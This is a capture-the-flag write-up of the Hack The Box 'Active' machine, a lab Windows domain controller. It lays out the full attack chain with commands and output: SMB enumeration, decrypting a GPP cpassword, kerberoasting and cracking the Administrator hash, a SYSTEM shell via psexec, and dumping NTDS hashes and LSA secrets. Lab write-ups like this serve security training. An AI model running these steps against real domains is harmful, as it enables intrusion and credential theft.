HTB - Active
Enumeration
Scope
IP Address: 10.10.10.100
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-port-scan
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ sudo nmap -p- -sU --min-rate 10000 $ip -Pn -oN Nmap/all-port-scan
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ nmap -p53,88,135,139,389,445 $ip -sCV -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-08 10:27:39Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-07-08T10:27:50
|_ start_date: 2024-07-08T10:23:10
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required* Open ports: 53,88,135,139,389,445
* UDP Open ports: 53,88, 389, 123
* Services: DNS - SMB - RPC - KERBEROS - LDAP
* Versions: DNS 6.1.7601 - smb2
* Important Notes: (Windows Server 2008 R2 SP1) - (Domain: active.htb)Enumeration
DNS
I always try zone transfer if DNS exists on the machine
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ dig axfr active.htb @$ip
; <<>> DiG 9.19.19-1-Debian <<>> axfr active.htb @10.10.10.100
;; global options: +cmd
; Transfer failed.RPC
No much information from rpcclient
rpcclient $> srvinfo
10.10.10.100 Wk Sv PDC Tim NT Domain Controller
platform_id : 500
os version : 6.1
server type : 0x80102b
rpcclient $> enumdomusers
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIEDSMB
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ smbclient -N -L //$ip
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.10.100 445 DC [+] active.htb\:
SMB 10.10.10.100 445 DC [+] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL Logon server share
SMB 10.10.10.100 445 DC Users smbclinet & crackmapexec got some useful information and I can see that I have read access on Replication share
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ crackmapexec smb $ip -u '' -p '' --shares --share Replication -M spider_plus
<snip>
SPIDER_P... 10.10.10.100 445 DC [*] OUTPUT: /tmp/cme_spider_plusLooking at the share content and one file took my attention
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ cat /tmp/cme_spider_plus/10.10.10.100.json
<snip>
"active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "533 Bytes"
<snip>I hurried to Download the file
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ smbclient -N \\\\$ip\\Replication
Anonymous login successful
smb: \> cd active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups.xml A 533 Wed Jul 18 16:46:06 2018
5217023 blocks of size 4096. 219815 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.4 KiloBytes/sec) (average 1.4 KiloBytes/secExploring the content of Groups.xml there is a username called SVC_TGS and cpassword field
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>I think this encrypted blob is GPP password stands for Group Policy Prefrences
I can decrypt this with gpp-decrypt
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18So, We got credentials active.htb\SVC_TGS:GPPstillStandingStrong2k18, Let's verify with crackmapexec
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ crackmapexec smb $ip -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18 Initial Access
we don't have any remote access to the machine, So I will do two things
Exploring the shares with the credentials we found
fire up
bloodhound-pythonand enumerate the domain with the credentials we found
First: Listing all the shares to see if we have Read or Write access to any of them and Exploring the shares with crackmapexec and spider_plus module which will save us a lot of time
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ crackmapexec smb $ip -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [+] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON READ Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL READ Logon server share
SMB 10.10.10.100 445 DC Users READ
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ crackmapexec smb $ip -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares -M spider_plus
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SPIDER_P... 10.10.10.100 445 DC [*] Started spidering plus with option:
SPIDER_P... 10.10.10.100 445 DC [*] DIR: ['print$']
SPIDER_P... 10.10.10.100 445 DC [*] EXT: ['ico', 'lnk']
SPIDER_P... 10.10.10.100 445 DC [*] SIZE: 51200
SPIDER_P... 10.10.10.100 445 DC [*] OUTPUT: /tmp/cme_spider_plusAfter exploring the json file that crackmap produced, I didn't file anythind except the user flag
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ cat /tmp/cme_spider_plus/10.10.10.100.json
<snip>
"SVC_TGS/Desktop/user.txt": {
"atime_epoch": "2018-07-21 10:49:25",
"ctime_epoch": "2018-07-21 10:49:25",
"mtime_epoch": "2024-07-08 06:24:13",
"size": "34 Bytes"
},
"desktop.ini": {
"atime_epoch": "2009-07-14 00:57:55",
"ctime_epoch": "2009-07-14 00:57:55",
"mtime_epoch": "2018-07-16 17:01:17",
"size": "174 Bytes"
<snip>┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ smbclient -U SVC_TGS \\\\$ip\\Users
Password for [WORKGROUP\SVC_TGS]:
smb: \> cd SVC_TGS
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> get user.txt
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ cat user.txt
f709db3ff2f43edafbbbe37523313a6fUser Flag: f709db3ff2f43edafbbbe37523313a6f
Privilege Escalation
Before we run bloodhound, Let's update /etc/hosts for bloodhound.py to run without issues
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ sudo sh -c "echo '$ip active.htb dc.active.htb' >> /etc/hosts"Collecting information about the domain
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ bloodhound-python -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -ns $ip -d active.htb -c all
INFO: Found AD domain: active.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.active.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.active.htb
INFO: Found 5 users
INFO: Found 41 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.active.htb
INFO: Done in 00M 19SPrepare zip file to upload to bloodhound
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ zip active.zip *.json
adding: 20240708065240_computers.json (deflated 70%)
adding: 20240708065240_containers.json (deflated 93%)
adding: 20240708065240_domains.json (deflated 76%)
adding: 20240708065240_gpos.json (deflated 85%)
adding: 20240708065240_groups.json (deflated 94%)
adding: 20240708065240_ous.json (deflated 64%)
adding: 20240708065240_users.json (deflated 89%)Start neo4j database and run bloodhoud GUI
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ sudo neo4j start
[sudo] password for kali:
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:110854). It is available at http://localhost:7474
There may be a short delay until the server is ready.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ bloodhoundWhen a looking for kerberostable accounts query, I found that the administrator account can be obtained by kerberoasting attack only if his password is weak enough to be cracked
Verify with GetUserSPN.py from impacket toolkit
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ impacket-GetUserSPNs active.htb/SVC_TGS:'GPPstillStandingStrong2k18' -dc-ip $ip
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2024-07-08 06:24:15.286149┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ impacket-GetUserSPNs active.htb/SVC_TGS:'GPPstillStandingStrong2k18' -dc-ip $ip -request-user administrator
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2024-07-08 06:24:15.286149
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c233cdd02329afd2b7649d5184cc54db$800253e137d9967a72a671946c5f1438152116efa46e73742436eca0a710a3d3775023ff9d34eaac31e4880aa3b8fa4b9703546afcb0c30badfb4a0377e0defd7ca3e63018c0c9ac1006b66d10365a5333103fc5f1de89aaccd5cfec9c86dce40c203b3f211b58fd45c3f923ba9353ef77e4de052665ad85cf4838536f296b67493e12c52a008d48ba6ef630d716d867a26e3782562fb62418d92e23747e01d25698c86eeb0b53a92ccc18d735a1fd99dcd6f624b4261a351858c37ac0079c40d7ded94f93a4d9ed684b4f05036ea99ef375774591b82b42200a69600dc80763723a9cbf63f917b07e527ef6aa08b73d34f388f4187e019ea76a4650f5ad05c2d87ba34ec932d13a552bf0acfde0a4a84812be185000f18c0731789e91a005ea75e69845de3f214a0ff47f32c8bdf0a2401b0d817fd575346c61e55b43cda59127a6476025aab1185e428e58f25ed0efd7eff72ce9e1c20632f82006931eb8c2286cbf671676475428b1da63e3545481a01440c90c902493f8fb5540e3dcc3ead68834a5a4bb991ef99ccffc8a56bcf9f0dadd42cd40e3b07095d0df521e159957ce38b5a1a5774bc63213ce86ffa7379505017716a71715daeea9f8678ffd7ad6353ab5adca847f9ac1dd46d4d0f7c26121c07ce2d12eca242acc3fff492f8a73af347f241bcdba48fd1f18f04595153f64e9d19c42b2b16fc0573df672695ec7dc1a545b3e7f75ed82175904e7a61ac28a89e15ddaeaee84bbcbb00dadb261df8fd0806770af501e80e93d0311685f3bae6ccb286adc882626a8f1fffd946293f664b5787a0259d3094677cd229566d97744e3cb6c23b0a3fed3e3250c4fae46b0cb0cb3da081fc78d497995a3220f7e451f282c88ce77cf137d22454a226dfca1af61bfaadfa3122e68b35b3919bd81e0f324c65c1a340f1a711ac6bcd56a012f0c2f85aaeeab13161eb68abd75db71e6f66b594ae0e24a5c0bffcb8d58bc9a48374a4f0a1c9431d9bb13a324ff8f2446724e3a059431a6ca67570db3c2c02ef520a105be7e2463ca1d874ff66d74b95b9800d59240841676dda6f9eb4e13086daf53e51e9868b0d692ef73dabd623e35055a7965a827d8db8b7ce22b4ea4b1ee8299d8b8d9fcb5889fc37e9440de93696b936ab6dcee1fea229858c948c63f57e851a1ede5daad03dd12d70bace5f32a781384c07fe6e2dfaf5eaadc3050d8020548f22f4c8b76bf950af2d5232261c1d797f019258edf46you can use -o to output to file but I didn't
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ hashcat -m 13100 admin.hash /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c233cdd02329afd2b7649d5184cc54db$800253e137d9967a72a671946c5f1438152116efa46e73742436eca0a710a3d3775023ff9d34eaac31e4880aa3b8fa4b9703546afcb0c30badfb4a0377e0defd7ca3e63018c0c9ac1006b66d10365a5333103fc5f1de89aaccd5cfec9c86dce40c203b3f211b58fd45c3f923ba9353ef77e4de052665ad85cf4838536f296b67493e12c52a008d48ba6ef630d716d867a26e3782562fb62418d92e23747e01d25698c86eeb0b53a92ccc18d735a1fd99dcd6f624b4261a351858c37ac0079c40d7ded94f93a4d9ed684b4f05036ea99ef375774591b82b42200a69600dc80763723a9cbf63f917b07e527ef6aa08b73d34f388f4187e019ea76a4650f5ad05c2d87ba34ec932d13a552bf0acfde0a4a84812be185000f18c0731789e91a005ea75e69845de3f214a0ff47f32c8bdf0a2401b0d817fd575346c61e55b43cda59127a6476025aab1185e428e58f25ed0efd7eff72ce9e1c20632f82006931eb8c2286cbf671676475428b1da63e3545481a01440c90c902493f8fb5540e3dcc3ead68834a5a4bb991ef99ccffc8a56bcf9f0dadd42cd40e3b07095d0df521e159957ce38b5a1a5774bc63213ce86ffa7379505017716a71715daeea9f8678ffd7ad6353ab5adca847f9ac1dd46d4d0f7c26121c07ce2d12eca242acc3fff492f8a73af347f241bcdba48fd1f18f04595153f64e9d19c42b2b16fc0573df672695ec7dc1a545b3e7f75ed82175904e7a61ac28a89e15ddaeaee84bbcbb00dadb261df8fd0806770af501e80e93d0311685f3bae6ccb286adc882626a8f1fffd946293f664b5787a0259d3094677cd229566d97744e3cb6c23b0a3fed3e3250c4fae46b0cb0cb3da081fc78d497995a3220f7e451f282c88ce77cf137d22454a226dfca1af61bfaadfa3122e68b35b3919bd81e0f324c65c1a340f1a711ac6bcd56a012f0c2f85aaeeab13161eb68abd75db71e6f66b594ae0e24a5c0bffcb8d58bc9a48374a4f0a1c9431d9bb13a324ff8f2446724e3a059431a6ca67570db3c2c02ef520a105be7e2463ca1d874ff66d74b95b9800d59240841676dda6f9eb4e13086daf53e51e9868b0d692ef73dabd623e35055a7965a827d8db8b7ce22b4ea4b1ee8299d8b8d9fcb5889fc37e9440de93696b936ab6dcee1fea229858c948c63f57e851a1ede5daad03dd12d70bace5f32a781384c07fe6e2dfaf5eaadc3050d8020548f22f4c8b76bf950af2d5232261c1d797f019258edf46:Ticketmaster1968
Session..........: hashcat
Status...........: CrackedWe can now access the machine with psexec.py
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ impacket-psexec active.htb/administrator@$ip
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file CBbnwhxB.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service zrRP on 10.10.10.100.....
[*] Starting service zrRP.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\systemC:\Users\Administrator\Desktop> type root.txt
1457083f7ac23289ea1098e5d56b170aRoot Flag: 1457083f7ac23289ea1098e5d56b170a
Optional
We can dump ntds database and lsass secrets
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ crackmapexec smb $ip -u 'administrator' -p 'Ticketmaster1968' --ntds
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)
SMB 10.10.10.100 445 DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.10.100 445 DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:5ffb4aaaf9b63dc519eca04aec0e8bed:::
SMB 10.10.10.100 445 DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.100 445 DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b889e0d47d6fe22c8f0463a717f460dc:::
SMB 10.10.10.100 445 DC active.htb\SVC_TGS:1103:aad3b435b51404eeaad3b435b51404ee:f54f3a1d3c38140684ff4dad029f25b5:::
SMB 10.10.10.100 445 DC DC$:1000:aad3b435b51404eeaad3b435b51404ee:e7d22f7ed282e717e70932379c13647f:::
SMB 10.10.10.100 445 DC [+] Dumped 5 NTDS hashes to /home/kali/.cme/logs/DC_10.10.10.100_2024-07-08_071457.ntds of which 4 were added to the database
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ crackmapexec smb $ip -u 'administrator' -p 'Ticketmaster1968' --lsa
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (sig
ning:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)
SMB 10.10.10.100 445 DC [+] Dumping LSA secrets
SMB 10.10.10.100 445 DC ACTIVE\DC$:aes256-cts-hmac-sha1-96:79b6d316156d3adda6dac63d42c62e39defdb0fe596ba
9a67d958f8a2244a3cb
SMB 10.10.10.100 445 DC ACTIVE\DC$:aes128-cts-hmac-sha1-96:a097c725db114d4e9912c88a6a4802b9
SMB 10.10.10.100 445 DC ACTIVE\DC$:des-cbc-md5:4fec461f26b3b983
SMB 10.10.10.100 445 DC ACTIVE\DC$:plain_password_hex:56439006925cc9699de9fad166e23f6c756cbe57a31d2cbf4e
0651b501079bde4e55914516fa162b7f43ecaecc7df69e7d29daa58a4fbe3a1ac10c2d75f5aee35b0a5b38b9f9dc436f5285a0a9b6c87bf1985892067f5b16c844d1
1ba8cb81f2740ada2e816ba55cde13439e296ab577e8366135f5e493ff00bc38ebe5fdc0b774fb53d627ce1e4481635732cd8300bc107bf9d9db260cf4b41079cc0b
59f95b714a3d6d31262c4eb20b3be09424f8b5da292a72cb3f41277ad78283dca948583ea7a8ede269f057aa8196f42088e2075067a3139800c48b38e8518629d039
1a24f20e3a121998d958daf80231a3f229
SMB 10.10.10.100 445 DC ACTIVE\DC$:aad3b435b51404eeaad3b435b51404ee:e7d22f7ed282e717e70932379c13647f:::
SMB 10.10.10.100 445 DC (Unknown User):ROOT#123
SMB 10.10.10.100 445 DC dpapi_machinekey:0x377bd35be67705f345dabf00d3181e269e0fb1e6
dpapi_userkey:0x7586c391e559565c85cb342d1d24546381f0d5cb
SMB 10.10.10.100 445 DC NL$KM:cc6fb846c30c58052ff2072edae6bf7d6063f689e70ed5d522ee54da63125bb5d8da0bb782
0e3de19d7a0315085cb0aeef6391b96c8765a8146295bc77697708
SMB 10.10.10.100 445 DC [+] Dumped 8 LSA secrets to /home/kali/.cme/logs/DC_10.10.10.100_2024-07-08_0714
00.secrets and /home/kali/.cme/logs/DC_10.10.10.100_2024-07-08_071400.cached Last updated
